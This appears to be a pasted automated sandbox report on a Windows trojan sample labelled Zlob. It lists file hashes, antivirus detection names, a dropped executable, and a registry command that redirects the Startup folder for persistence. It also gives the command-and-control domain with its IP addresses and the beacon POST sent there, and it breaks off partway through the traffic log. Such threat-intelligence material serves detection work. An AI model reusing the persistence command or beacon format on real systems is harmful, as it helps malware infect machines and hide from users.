
Zlob Malware JSON Report

paladin316 Jun 18th, 2019 115 Never
  1.  
  2. [*] MalFamily: "Zlob"
  3.  
  4. [*] MalScore: 10.0
  5.  
  6. [*] File Name: "01"
  7. [*] File Size: 57096
  8. [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. [*] SHA256: "d08e515044a61b2b2dad9deda564460914a9559cdfb9772babf04039d3814252"
  10. [*] MD5: "8caf035dd4cf30a9904ff243c372df6e"
  11. [*] SHA1: "470bc49c9d3923c73148dd9d58395199f9743df5"
  12. [*] SHA512: "e53f36e0c8e6b4662c5a6e06a1c8c8f42bd3d0c4f3f75642ca2ab96df189132686b4142959d2f622dc8336835ed5e752f1efce26e12957a2609ad7ccc5c433a2"
  13. [*] CRC32: "13613AA0"
  14. [*] SSDEEP: "768:3P6FP6vnVPXovpOg0nBZpfW89DvGH7dc7vCy6vUg/O43ZY1KgGEJC:CFAPXfg0nzpV9rGHq7v1x4paoEA"
  15.  
  16. [*] Process Execution: [
  17.     "01.exe",
  18.     "hkmoov.exe",
  19.     "reg.exe"
  20. ]
  21.  
  22. [*] Signatures Detected: [
  23.     {
  24.         "Description": "Creates RWX memory",
  25.         "Details": []
  26.     },
  27.     {
  28.         "Description": "A process attempted to delay the analysis task.",
  29.         "Details": [
  30.             {
  31.                 "Process": "hkmoov.exe tried to sleep 1740 seconds, actually delayed analysis time by 0 seconds"
  32.             }
  33.         ]
  34.     },
  35.     {
  36.         "Description": "Reads data out of its own binary image",
  37.         "Details": [
  38.             {
  39.                 "self_read": "process: 01.exe, pid: 2704, offset: 0x00000000, length: 0x0000df08"
  40.             }
  41.         ]
  42.     },
  43.     {
  44.         "Description": "Drops a binary and executes it",
  45.         "Details": [
  46.             {
  47.                 "binary": "C:\\programdata\\d61e6e07ea\\hkmoov.exe"
  48.             }
  49.         ]
  50.     },
  51.     {
  52.         "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  53.         "Details": [
  54.             {
  55.                 "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  56.             },
  57.             {
  58.                 "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  59.             },
  60.             {
  61.                 "suspicious_request": "http://safegross.com/ppk/index.php"
  62.             },
  63.             {
  64.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  65.             },
  66.             {
  67.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  68.             },
  69.             {
  70.                 "suspicious_request": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  71.             },
  72.             {
  73.                 "suspicious_request": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe"
  74.             },
  75.             {
  76.                 "suspicious_request": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes"
  77.             }
  78.         ]
  79.     },
  80.     {
  81.         "Description": "Performs some HTTP requests",
  82.         "Details": [
  83.             {
  84.                 "url": "http://safegross.com/ppk/index.php"
  85.             },
  86.             {
  87.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D"
  88.             },
  89.             {
  90.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D"
  91.             },
  92.             {
  93.                 "url": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D"
  94.             },
  95.             {
  96.                 "url": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe"
  97.             },
  98.             {
  99.                 "url": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes"
  100.             }
  101.         ]
  102.     },
  103.     {
  104.         "Description": "Attempts to identify installed AV products by installation directory",
  105.         "Details": [
  106.             {
  107.                 "file": "C:\\ProgramData\\AVAST Software"
  108.             },
  109.             {
  110.                 "file": "C:\\ProgramData\\Avira"
  111.             },
  112.             {
  113.                 "file": "C:\\ProgramData\\Kaspersky Lab"
  114.             },
  115.             {
  116.                 "file": "C:\\ProgramData\\ESET"
  117.             },
  118.             {
  119.                 "file": "C:\\ProgramData\\Panda Security"
  120.             },
  121.             {
  122.                 "file": "C:\\ProgramData\\Bitdefender"
  123.             },
  124.             {
  125.                 "file": "C:\\ProgramData\\AVG"
  126.             },
  127.             {
  128.                 "file": "C:\\ProgramData\\Doctor Web"
  129.             }
  130.         ]
  131.     },
  132.     {
  133.         "Description": "File has been identified by 24 Antiviruses on VirusTotal as malicious",
  134.         "Details": [
  135.             {
  136.                 "FireEye": "Generic.mg.8caf035dd4cf30a9"
  137.             },
  138.             {
  139.                 "McAfee": "Artemis!8CAF035DD4CF"
  140.             },
  141.             {
  142.                 "ESET-NOD32": "a variant of Win32/Kryptik.GUCF"
  143.             },
  144.             {
  145.                 "Paloalto": "generic.ml"
  146.             },
  147.             {
  148.                 "Kaspersky": "Trojan.Win32.Agent.xaalpa"
  149.             },
  150.             {
  151.                 "Avast": "Win32:BackdoorX-gen [Trj]"
  152.             },
  153.             {
  154.                 "Rising": "Trojan.Kryptik!8.8 (CLOUD)"
  155.             },
  156.             {
  157.                 "Sophos": "Troj/Agent-BBUR"
  158.             },
  159.             {
  160.                 "F-Secure": "Trojan.TR/AD.Zlob.wkfyf"
  161.             },
  162.             {
  163.                 "DrWeb": "Trojan.SpyBot.840"
  164.             },
  165.             {
  166.                 "Invincea": "heuristic"
  167.             },
  168.             {
  169.                 "McAfee-GW-Edition": "Artemis!Trojan"
  170.             },
  171.             {
  172.                 "Ikarus": "Backdoor.Rat.FlawedAmmyy"
  173.             },
  174.             {
  175.                 "Avira": "TR/AD.Zlob.wkfyf"
  176.             },
  177.             {
  178.                 "Microsoft": "TrojanDownloader:Win32/Zlob.ZXP!bit"
  179.             },
  180.             {
  181.                 "Endgame": "malicious (high confidence)"
  182.             },
  183.             {
  184.                 "ZoneAlarm": "Trojan.Win32.Agent.xaalpa"
  185.             },
  186.             {
  187.                 "AhnLab-V3": "Trojan/Win32.Agent.C3291732"
  188.             },
  189.             {
  190.                 "ALYac": "Backdoor.RAT.FlawedAmmyy"
  191.             },
  192.             {
  193.                 "Tencent": "Win32.Trojan.Raasmx.Auto"
  194.             },
  195.             {
  196.                 "SentinelOne": "DFI - Suspicious PE"
  197.             },
  198.             {
  199.                 "Fortinet": "W32/GenKryptik.DKZJ!tr"
  200.             },
  201.             {
  202.                 "AVG": "Win32:BackdoorX-gen [Trj]"
  203.             },
  204.             {
  205.                 "CrowdStrike": "win/malicious_confidence_70% (W)"
  206.             }
  207.         ]
  208.     },
  209.     {
  210.         "Description": "Creates a copy of itself",
  211.         "Details": [
  212.             {
  213.                 "copy": "C:\\programdata\\d61e6e07ea\\hkmoov.exe"
  214.             }
  215.         ]
  216.     }
  217. ]
  218.  
  219. [*] Started Service: []
  220.  
  221. [*] Executed Commands: [
  222.     "c:\\programdata\\d61e6e07ea\\hkmoov.exe",
  223.     "REG ADD \"HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\" /f /v Startup /t REG_SZ /d C:\\ProgramData\\d61e6e07ea"
  224. ]
  225.  
  226. [*] Mutexes: []
  227.  
  228. [*] Modified Files: [
  229.     "C:\\ProgramData\\0",
  230.     "C:\\programdata\\d61e6e07ea\\hkmoov.exe",
  231.     "C:\\programdata\\d61e6e07ea\\hkmoov.exe:Zone.Identifier"
  232. ]
  233.  
  234. [*] Deleted Files: []
  235.  
  236. [*] Modified Registry Keys: [
  237.     "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\\Startup"
  238. ]
  239.  
  240. [*] Deleted Registry Keys: []
  241.  
  242. [*] DNS Communications: [
  243.     {
  244.         "type": "A",
  245.         "request": "safegross.com",
  246.         "answers": [
  247.             {
  248.                 "data": "151.237.80.80",
  249.                 "type": "A"
  250.             },
  251.             {
  252.                 "data": "89.238.207.5",
  253.                 "type": "A"
  254.             },
  255.             {
  256.                 "data": "93.103.166.70",
  257.                 "type": "A"
  258.             },
  259.             {
  260.                 "data": "37.152.176.90",
  261.                 "type": "A"
  262.             },
  263.             {
  264.                 "data": "91.104.177.151",
  265.                 "type": "A"
  266.             },
  267.             {
  268.                 "data": "89.190.74.198",
  269.                 "type": "A"
  270.             },
  271.             {
  272.                 "data": "2.185.146.116",
  273.                 "type": "A"
  274.             },
  275.             {
  276.                 "data": "5.253.53.236",
  277.                 "type": "A"
  278.             },
  279.             {
  280.                 "data": "95.158.162.200",
  281.                 "type": "A"
  282.             },
  283.             {
  284.                 "data": "197.255.225.249",
  285.                 "type": "A"
  286.             },
  287.             {
  288.                 "data": "89.45.19.26",
  289.                 "type": "A"
  290.             },
  291.             {
  292.                 "data": "186.87.135.97",
  293.                 "type": "A"
  294.             },
  295.             {
  296.                 "data": "193.33.1.18",
  297.                 "type": "A"
  298.             },
  299.             {
  300.                 "data": "31.5.167.149",
  301.                 "type": "A"
  302.             },
  303.             {
  304.                 "data": "41.110.200.194",
  305.                 "type": "A"
  306.             },
  307.             {
  308.                 "data": "85.187.48.16",
  309.                 "type": "A"
  310.             },
  311.             {
  312.                 "data": "181.59.254.21",
  313.                 "type": "A"
  314.             },
  315.             {
  316.                 "data": "89.45.19.24",
  317.                 "type": "A"
  318.             },
  319.             {
  320.                 "data": "86.101.230.109",
  321.                 "type": "A"
  322.             }
  323.         ]
  324.     }
  325. ]
  326.  
  327. [*] Domains: [
  328.     {
  329.         "ip": "",
  330.         "domain": "safegross.com"
  331.     }
  332. ]
  333.  
  334. [*] Network Communication - ICMP: []
  335.  
  336. [*] Network Communication - HTTP: [
  337.     {
  338.         "count": 29,
  339.         "body": "id=2818818937&sd=34d082&vs=1.30&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  340.         "uri": "http://safegross.com/ppk/index.php",
  341.         "user-agent": "",
  342.         "method": "POST",
  343.         "host": "safegross.com",
  344.         "version": "1.1",
  345.         "path": "/ppk/index.php",
  346.         "data": "POST /ppk/index.php HTTP/1.1\r\nHost: safegross.com\r\nAccept: */*\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 76\r\n\r\nid=2818818937&sd=34d082&vs=1.30&ar=1&bi=1&lv=0&os=9&av=0&pc=Host&un=user&",
  347.         "port": 80
  348.     },
  349.     {
  350.         "count": 1,
  351.         "body": "",
  352.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  353.         "user-agent": "Microsoft-CryptoAPI/6.1",
  354.         "method": "GET",
  355.         "host": "ocsp.digicert.com",
  356.         "version": "1.1",
  357.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D",
  358.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBTfqhLjKLEJQZPin0KCzkdAQpVYowQUsT7DaQP4v0cB1JgmGggC72NkK8MCEAPxtOFfOoLxFJZ4s9fYR1w%3D HTTP/1.1\r\nCache-Control: max-age = 150849\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 10:50:30 GMT\r\nIf-None-Match: \"5ced1276-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  359.         "port": 80
  360.     },
  361.     {
  362.         "count": 1,
  363.         "body": "",
  364.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  365.         "user-agent": "Microsoft-CryptoAPI/6.1",
  366.         "method": "GET",
  367.         "host": "ocsp.digicert.com",
  368.         "version": "1.1",
  369.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D",
  370.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEA%2BdzSc7B3UzA8k03selSwo%3D HTTP/1.1\r\nCache-Control: max-age = 135176\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 05:30:18 GMT\r\nIf-None-Match: \"5cecc76a-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  371.         "port": 80
  372.     },
  373.     {
  374.         "count": 1,
  375.         "body": "",
  376.         "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  377.         "user-agent": "Microsoft-CryptoAPI/6.1",
  378.         "method": "GET",
  379.         "host": "ocsp.digicert.com",
  380.         "version": "1.1",
  381.         "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D",
  382.         "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSPwl%2BrBFlJbvzLXU1bGW08VysJ2wQUj%2Bh%2B8G0yagAFI8dwl2o6kP9r6tQCEAaJg2QslT5G973OQUPxM8E%3D HTTP/1.1\r\nCache-Control: max-age = 168744\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 15:00:08 GMT\r\nIf-None-Match: \"5ced4cf8-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
  383.         "port": 80
  384.     },
  385.     {
  386.         "count": 1,
  387.         "body": "",
  388.         "uri": "http://redirector.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe",
  389.         "user-agent": "Microsoft BITS/7.5",
  390.         "method": "HEAD",
  391.         "host": "redirector.gvt1.com",
  392.         "version": "1.1",
  393.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe",
  394.         "data": "HEAD /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: redirector.gvt1.com\r\n\r\n",
  395.         "port": 80
  396.     },
  397.     {
  398.         "count": 1,
  399.         "body": "",
  400.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  401.         "user-agent": "Microsoft BITS/7.5",
  402.         "method": "HEAD",
  403.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  404.         "version": "1.1",
  405.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  406.         "data": "HEAD /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  407.         "port": 80
  408.     },
  409.     {
  410.         "count": 1,
  411.         "body": "",
  412.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  413.         "user-agent": "Microsoft BITS/7.5",
  414.         "method": "GET",
  415.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  416.         "version": "1.1",
  417.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  418.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=0-6820\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  419.         "port": 80
  420.     },
  421.     {
  422.         "count": 1,
  423.         "body": "",
  424.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  425.         "user-agent": "Microsoft BITS/7.5",
  426.         "method": "GET",
  427.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  428.         "version": "1.1",
  429.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  430.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=6821-17424\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  431.         "port": 80
  432.     },
  433.     {
  434.         "count": 1,
  435.         "body": "",
  436.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  437.         "user-agent": "Microsoft BITS/7.5",
  438.         "method": "GET",
  439.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  440.         "version": "1.1",
  441.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  442.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=17425-27568\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  443.         "port": 80
  444.     },
  445.     {
  446.         "count": 1,
  447.         "body": "",
  448.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  449.         "user-agent": "Microsoft BITS/7.5",
  450.         "method": "GET",
  451.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  452.         "version": "1.1",
  453.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  454.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=27569-38149\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  455.         "port": 80
  456.     },
  457.     {
  458.         "count": 1,
  459.         "body": "",
  460.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  461.         "user-agent": "Microsoft BITS/7.5",
  462.         "method": "GET",
  463.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  464.         "version": "1.1",
  465.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  466.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=38150-60344\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  467.         "port": 80
  468.     },
  469.     {
  470.         "count": 1,
  471.         "body": "",
  472.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  473.         "user-agent": "Microsoft BITS/7.5",
  474.         "method": "GET",
  475.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  476.         "version": "1.1",
  477.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  478.         "data": "GET /edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nIf-Unmodified-Since: Tue, 18 Jun 2019 05:17:16 GMT\r\nRange: bytes=60345-105675\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: r5---sn-tt1e7n7e.gvt1.com\r\n\r\n",
  479.         "port": 80
  480.     },
  481.     {
  482.         "count": 1,
  483.         "body": "",
  484.         "uri": "http://r5---sn-tt1e7n7e.gvt1.com/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
  485.         "user-agent": "Microsoft BITS/7.5",
  486.         "method": "GET",
  487.         "host": "r5---sn-tt1e7n7e.gvt1.com",
  488.         "version": "1.1",
  489.         "path": "/edgedl/release2/chrome/AO3hITetZBsR_75.0.3770.100/75.0.3770.100_74.0.3729.169_chrome_updater.exe?cms_redirect=yes&mip=172.98.67.13&mm=28&mn=sn-tt1e7n7e&ms=nvh&mt=1560903262&mv=m&pl=24&shardbypass=yes",
